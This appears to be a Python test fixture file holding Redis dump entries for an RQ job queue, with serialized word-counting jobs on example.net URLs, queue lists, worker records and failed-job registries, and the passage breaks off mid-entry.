(b'rq:job:fd4c7c24-6a46-465c-a2fa-14f5198725f9', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x06origin\x06medium\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.227177Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.226935Z\x08\x00G\x94\xa4\xe2lpR\xb4'),
(b'rq:job:91478a7d-9165-43b5-8f5a-f91a37a8feea', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x06origin\x03low\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.418265Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.418029Z\x08\x00\xc3\xb6M\xad/q\'X'),
(b'rq:queue:medium', 0, b'\x0e\x01@}}\x00\x00\x00V\x00\x00\x00\x03\x00\x00$f9f7c364-3f6d-4326-b724-c6f6983b05bb&$fd4c7c24-6a46-465c-a2fa-14f5198725f9&$1b2b1887-d608-4662-86fa-560d7b575fd0\xff\x08\x00\xd1q3\xab\xb6\xb7\xad\x8c'),
(b'rq:job:1fbc9695-c0a7-4302-8a77-9304ca86057b', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x06origin\x03low\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.131776Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.131501Z\x08\x00\x93\xa0j\xda\xf9\xf2\xb0\xac'),
(b'rq:queue:low', 0, b'\x0e\x01@}}\x00\x00\x00V\x00\x00\x00\x03\x00\x00$acfa2647-5e40-4510-9e8c-303df1dbc757&$1fbc9695-c0a7-4302-8a77-9304ca86057b&$91478a7d-9165-43b5-8f5a-f91a37a8feea\xff\x08\x00\x17\xa4em\xf4\xf0\xb99'),
(b'rq:job:95ae312d-3ae6-4846-9d9a-c7cdb36254ba', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x06origin\x04high\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.035242Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.034930Z\x08\x00\xbf\x8eq\x92\xabr\x98 '),
(b'rq:queue:high', 0, b"\x0e\x01@}}\x00\x00\x00V\x00\x00\x00\x03\x00\x00$95ae312d-3ae6-4846-9d9a-c7cdb36254ba&$0b8e247a-81f6-4de2-8fde-080a2518b5bc&$bcb5774c-24c6-4d99-a45d-cf9c9d560571\xff\x08\x00\x15~'\xbf\xeb\x139\xf8"),
(b'rq:job:1b2b1887-d608-4662-86fa-560d7b575fd0', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x06origin\x06medium\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.511732Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.511490Z\x08\x00\x06\x0b\xa0t\x0ctw\x13'),
(b'rq:job:acfa2647-5e40-4510-9e8c-303df1dbc757', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x06origin\x03low\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:18.841263Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:18.840834Z\x08\x00\x8bSL\x85\xeco\x99\xa0'),
(b'rq:queues', 0, b'\x02\x03\x0frq:queue:medium\x0crq:queue:low\rrq:queue:high\x08\x00-\x1cw\x14lM\xc4\x1c'),
(b'rq:job:f9f7c364-3f6d-4326-b724-c6f6983b05bb', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x06origin\x06medium\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:18.942075Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:18.941830Z\x08\x00\xb2XL\xdd\xfd.\x9a\xf8'),
]
fxt_some_failed = [
(b'rq:job:bcb5774c-24c6-4d99-a45d-cf9c9d560571', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x06origin\x04high\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.606034Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.605756Z\x08\x00\x823]\xe9\xcd\\\x0c\x85'),
(b'rq:job:91478a7d-9165-43b5-8f5a-f91a37a8feea', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x06origin\x03low\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.418265Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.418029Z\x08\x00\xc3\xb6M\xad/q\'X'),
(b'rq:job:1fbc9695-c0a7-4302-8a77-9304ca86057b', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x06origin\x03low\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.131776Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.131501Z\x08\x00\x93\xa0j\xda\xf9\xf2\xb0\xac'),
(b'rq:clean_registries:high', 889, b'\x00\xc0\x01\x08\x00\x9fU\x0b\tx\x18\x9b\xc4'),
(b'rq:worker:198c9f1ad12e44daaab9ed2b5deb15bf', 46, b'\r\xc3@\xca@\xec\x04\xec\x00\x00\x00\xce \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:47:54.8\x1647727Z\x1d\x0elast_heartbeat\x10\xe0\r,\x1f70410Z\x1d\x06queues\x08\x06medium\x08\x03pid\x05\xc0\xe94\x04\x1f\x08hostname\n\x08parabook\n\x05state\x07\x04idle\x1f\x06\x10failed_job_count\x12\xf2\x02\x12total_work\x14ing_time\x14\x080.001561\n\x05d \x8e\xe0\x0f\xbc\x0670804Z\xff\x08\x00\x14b\xce\xdfqRr\xc5'),
(b'rq:clean_registries:low', 880, b'\x00\xc0\x01\x08\x00\x9fU\x0b\tx\x18\x9b\xc4'),
(b'rq:job:95ae312d-3ae6-4846-9d9a-c7cdb36254ba', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.034930Z\nstarted_at\x1b2019-08-12T20:47:58.642547Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:47:58.644125Z\x06origin\x04high\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.035242Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xa7\x7f\x8f\xfa\xc7\xdf\xc9\xaf'),
(b'rq:job:f9f7c364-3f6d-4326-b724-c6f6983b05bb', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:18.941830Z\nstarted_at\x1b2019-08-12T20:47:54.862943Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:47:54.864504Z\x06origin\x06medium\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:18.942075Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00R\x88\x9f\xc5<\xf1\xfc\xb6'),
(b'rq:job:0b8e247a-81f6-4de2-8fde-080a2518b5bc', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x06origin\x04high\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.323981Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.323621Z\x08\x00]tp\xcc\xb3\xd0<\x13'),
(b'rq:failed:high', 0, b'\x0c77\x00\x00\x000\x00\x00\x00\x02\x00\x00$95ae312d-3ae6-4846-9d9a-c7cdb36254ba&\xd0\xfe\x033_\xff\x08\x008\x18\xea\xd9B\x16\xcd\x10'),
(b'rq:job:fd4c7c24-6a46-465c-a2fa-14f5198725f9', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x06origin\x06medium\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.227177Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.226935Z\x08\x00G\x94\xa4\xe2lpR\xb4'),
(b'rq:queue:medium', 0, b'\x0e\x01@WW\x00\x00\x000\x00\x00\x00\x02\x00\x00$fd4c7c24-6a46-465c-a2fa-14f5198725f9&$1b2b1887-d608-4662-86fa-560d7b575fd0\xff\x08\x00\xa1Y\x8e\xa3L\xde}\xfa'),
(b'rq:clean_registries:medium', 885, b'\x00\xc0\x01\x08\x00\x9fU\x0b\tx\x18\x9b\xc4'),
(b'rq:queue:low', 0, b'\x0e\x01@WW\x00\x00\x000\x00\x00\x00\x02\x00\x00$1fbc9695-c0a7-4302-8a77-9304ca86057b&$91478a7d-9165-43b5-8f5a-f91a37a8feea\xff\x08\x00H\xc3\xed\xc5d\xb8\x85\x0b'),
(b'rq:worker:dc519fbace1f443e96ed15344cd64972', 41, b'\r\xc3@\xc6@\xe8\x04\xe8\x00\x00\x00\xca \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:47:49.9\x1616879Z\x1d\x0elast_heartbeat\x10\xe0\r,\x1f45882Z\x1d\x06queues\x08\x03low\x05\x03pid\x05\xc0\xe34\x04\x08ho\x1fstname\n\x08parabook\n\x05state\x07\x04idle\x06\x10f\x1failed_job_count\x12\xf2\x02\x12total_working\x10_time\x14\x070.00302\t\x05d \x8a\xe0\x0f\xb8\x0646153Z\xff\x08\x00\xa8\xca\x14\x8d8\xee-\xb4'),
(b'rq:queue:high', 0, b'\x0e\x01@WW\x00\x00\x000\x00\x00\x00\x02\x00\x00$0b8e247a-81f6-4de2-8fde-080a2518b5bc&$bcb5774c-24c6-4d99-a45d-cf9c9d560571\xff\x08\x00I\xa2\xe6F\x8a\x9a\xccQ'),
(b'rq:worker:507c96f6edd94e1ea50a928331004fbc', 50, b'\r\xc3@\xc8@\xea\x04\xea\x00\x00\x00\xcc \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:47:58.6\x1622604Z\x1d\x0elast_heartbeat\x10\xe0\r,\x1f50285Z\x1d\x06queues\x08\x04high\x06\x03pid\x05\xc0\xeb4\x04\x08h\x1fostname\n\x08parabook\n\x05state\x07\x04idle\x06\x10\x1ffailed_job_count\x12\xf2\x02\x12total_workin\x12g_time\x14\x080.001578\n\x05d \x8c\xe0\x0f\xba\x0650639Z\xff\x08\x00\xeb\r\xf7\x83\xc1g6\xb7'),
(b'rq:failed:medium', 0, b'\x0c77\x00\x00\x000\x00\x00\x00\x02\x00\x00$f9f7c364-3f6d-4326-b724-c6f6983b05bb&\xd0\xfa\x033_\xff\x08\x00`@\xd6\x1a\xe4\xae\xd8+'),
(b'rq:queues', 0, b'\x02\x03\x0frq:queue:medium\x0crq:queue:low\rrq:queue:high\x08\x00-\x1cw\x14lM\xc4\x1c'),
(b'rq:job:acfa2647-5e40-4510-9e8c-303df1dbc757', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:18.840834Z\nstarted_at\x1b2019-08-12T20:47:49.932673Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:47:49.935693Z\x06origin\x03low\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:18.841263Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xa0v\xb06\x8fb\x12\xf5'),
(b'rq:job:1b2b1887-d608-4662-86fa-560d7b575fd0', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x06origin\x06medium\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.511732Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.511490Z\x08\x00\x06\x0b\xa0t\x0ctw\x13'),
(b'rq:failed:low', 0, b'\x0c77\x00\x00\x000\x00\x00\x00\x02\x00\x00$acfa2647-5e40-4510-9e8c-303df1dbc757&\xd0\xf5\x033_\xff\x08\x00U\x1c\x03\xd6V\xbcA\x13'),
]
fxt_all_failed = [
(b'rq:worker:acc0ece6b0f04881a71f34ca4b87bc16', 47, b'\r\xc3@\xc9@\xe9\x04\xe9\x00\x00\x00\xcb \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:49:26.2\x1694079Z\x1d\x0elast_heartbeat\x10\xe0\x0c,\x1f316801Z\x1d\x06queues\x08\x03low\x05\x03pid\x05\xc075\x04\x08h\x1fostname\n\x08parabook\n\x05state\x07\x04idle\x06\x10\x1ffailed_job_count\x12\xf2\x02\x12total_workin\x12g_time\x14\x080.001564\n\x05d \x8b\xe0\x0e\xb9\x07317126Z\xff\x08\x006\xfc\x87\xeeq\xea\x85\x94'),
(b'rq:worker:fb1f6a5845194c8782156931fb7f0799', 46, b'\r\xc3@\xc6@\xe8\x04\xe8\x00\x00\x00\xca \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:49:24.6\x1609885Z\x1d\x0elast_heartbeat\x10\xe0\r,\x1f34597Z\x1d\x06queues\x08\x04high\x06\x03pid\x05\xc055\x04\x08h\x1fostname\n\x08parabook\n\x05state\x07\x04idle\x06\x10\x1ffailed_job_count\x12\xf2\x02\x12total_workin\x10g_time\x14\x060.0016\x08\x05d \x8a\xe0\x0f\xb8\x0634936Z\xff\x08\x00\xd5\x82\x070\xe52\x16P'),
(b'rq:worker:5985fbe437404accb72c275ec1ed6425', 41, b'\r\xc3@\xc6@\xe9\x04\xe9\x00\x00\x00\xcb \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:49:20.0\x1609708Z\x1d\x0elast_heartbeat\x10\xe0\r,\x0130 /\x1fZ\x1d\x06queues\x08\x03low\x05\x03pid\x05\xc005\x04\x08hostnam\x1fe\n\x08parabook\n\x05state\x07\x04idle\x06\x10failed\x1f_job_count\x12\xf2\x02\x12total_working_time\x01\x14\x08@\x96\x061653\n\x05d \x8b\xe0\x0f\xb9\x0630343Z\xff\x08\x00W{Rq[Mww'),
(b'rq:job:bcb5774c-24c6-4d99-a45d-cf9c9d560571', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.605756Z\nstarted_at\x1b2019-08-12T20:49:30.794920Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:49:30.796437Z\x06origin\x04high\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.606034Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xd0\xf4\xa6\x86~\xef\xf5\xed'),
(b'rq:job:91478a7d-9165-43b5-8f5a-f91a37a8feea', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.418029Z\nstarted_at\x1b2019-08-12T20:49:26.307127Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:49:26.308691Z\x06origin\x03low\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.418265Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7f